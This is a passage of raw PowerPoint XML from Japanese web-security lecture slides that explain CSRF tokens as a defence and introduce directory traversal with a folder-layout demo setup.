              <a:t>対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常に送金される</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB3779B-0BAE-BFAB-9BA5-E5D9AB3A8131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066875" y="2768591"/>
            <a:ext cx="8058249" cy="3458068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35805447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FA3DC4-CFE4-5B26-51A0-AEB269CCA817}"/>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DE24711F-E540-B4A5-3702-F67C4031F4A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ボタンを押す</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2CFFE4E-42BB-163E-6205-3DB6746A2427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2531865" y="2887743"/>
            <a:ext cx="7128270" cy="3547323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39584496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67177C-13AC-1B75-17A1-149D5BE7B966}"/>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D041DCE8-E6DB-9665-6422-C1B0DCC3BEDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>罠サイト：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>タグの変数名「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」が無いため</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Bad Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>になる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B51F244-2062-FA3A-C711-F1E0FEC3FEA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944456" y="2916159"/>
            <a:ext cx="8303087" cy="2338898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9945940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CC8AAB-1F40-51A2-C5C2-2911967701E5}"/>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2C8CFA14-C5FB-D89E-B52F-25C0A02E88CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常サイト：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ソース</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>入力画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>行目にランダムな</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>進数の文字列が表示されている</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66EB70BD-2705-BB00-78F0-BD6678B3DE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3641072"/>
            <a:ext cx="10515600" cy="1860240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3305747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645A0D-80BE-E4FA-B055-96D25A5DB34B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>今までの講座の補足</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C9D570-693C-2DEA-71AC-7DFA0CB45001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>回までの内容でサーバ側の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サービスのプログラムに最低限必要なことはおおよそできるようになる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>しかし、どんなに優れたサービスでも脆弱性があれば人気・信用とも失うため、セキュリティを強化することでサービスを安心して使ってもらうことに繋がる。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="862778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5B0B5E-0446-B9A7-694D-486EEA399298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>クロスサイトリクエストフォージェリ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダー 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{183E4884-2632-9C97-8BF0-8A3600A2AF31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策を適用する場所</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>データを送信して何らかのデータの変更・追加・削除など主に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で送信する際に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>対策をすることで不正なデータ送信による被害を減らすことができる。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21307013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0CA1EC-CB0A-B374-10E8-E6A34200EFAD}"/>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915D39D1-437E-499B-7D67-A01E0447E7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>コンピュータシステムへの攻撃手法の一つで、ファイル名を扱うようなプログラムに対して特殊な文字列を送信することにより、通常はアクセスできないファイルやディレクトリ（フォルダ）の内容を取得する手法。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C390B98-2D4E-677B-95D1-5C5A2004C794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5271715" y="6326602"/>
            <a:ext cx="6629399" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>出典：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>https://e-words.jp/w/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>.html</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3609292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EAC56F-7465-D0E0-1A41-B12A1B42D27E}"/>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9EE52F52-6407-C338-C9AC-6BA41CDC5E2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサルの仕組み</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>元々プログラムから開くファイルの位置が定義されている場合に特殊な文字を入れることでフォルダ移動ができるようになる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4648483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231733-F598-ABBB-135F-970512400B4E}"/>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070439B9-5C4E-AF07-77E7-D142F86DC5AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサルの仕組み</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>準備：構成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」という名前のフォルダを作成して、「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」の中に公開ファイルを保存する「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」という名前のフォルダと秘密ファイルを保存する「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」という名前のフォルダを作成する。また、その他のファイルを入れる「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」フォルダを作成。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1351B7F-2F1C-F064-D2E3-6A07BF56B523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="8692" r="63949"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4001294"/>
            <a:ext cx="1566407" cy="857370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="図 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D91EEF-3729-E05C-5A7B-A2B6CB5A8140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="2941" r="18182"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7589257" y="4720529"/>
            <a:ext cx="1629002" cy="628737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="図 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356254E8-5190-444C-D8EC-199EFAB13E5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7589257" y="5477325"/>
            <a:ext cx="1629002" cy="514422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="コネクタ: カギ線 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34987E0E-1C7A-CD2E-79D1-98B2F6C52506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828802" y="4253948"/>
            <a:ext cx="2344190" cy="376082"/>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9D649FE9-E45C-C6ED-BBBB-093211B6DCC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172992" y="3967950"/>
            <a:ext cx="1295581" cy="1324160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="コネクタ: カギ線 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E361C5DC-75EC-A596-AF0D-EE10634E6582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327374" y="5049078"/>
